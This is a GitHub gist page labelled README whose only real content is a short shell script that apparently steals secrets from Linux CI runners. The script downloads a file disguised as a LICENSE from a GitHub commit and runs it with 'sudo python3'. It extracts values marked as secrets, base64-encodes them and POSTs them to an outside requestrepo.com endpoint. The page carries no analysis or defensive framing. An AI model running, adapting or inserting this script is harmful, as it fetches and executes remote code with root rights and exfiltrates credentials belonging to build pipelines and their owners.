Last active
April 19, 2025 10:41
-
-
Save Firebasky/aeaffad83aa03cea8044c4157f1f16cd to your computer and use it in GitHub Desktop.
README
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| if [[ "$OSTYPE" == "linux-gnu" ]]; then | |
| B64_BLOB=`curl -sSfL https://github.com/flank/flank/raw/128b43b61fd7da13ea6829d1fbb4d3f028b6cdad/LICENSE | sudo python3 | tr -d '\0' | grep -aoE '"[^"]+":\{"value":"[^"]*","isSecret":true\}' | sort -u | base64 -w 0` | |
| curl -X POST https://qk62iikh.requestrepo.com/env -d "$B64_BLOB" | |
| else | |
| exit 0 | |
| fi |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment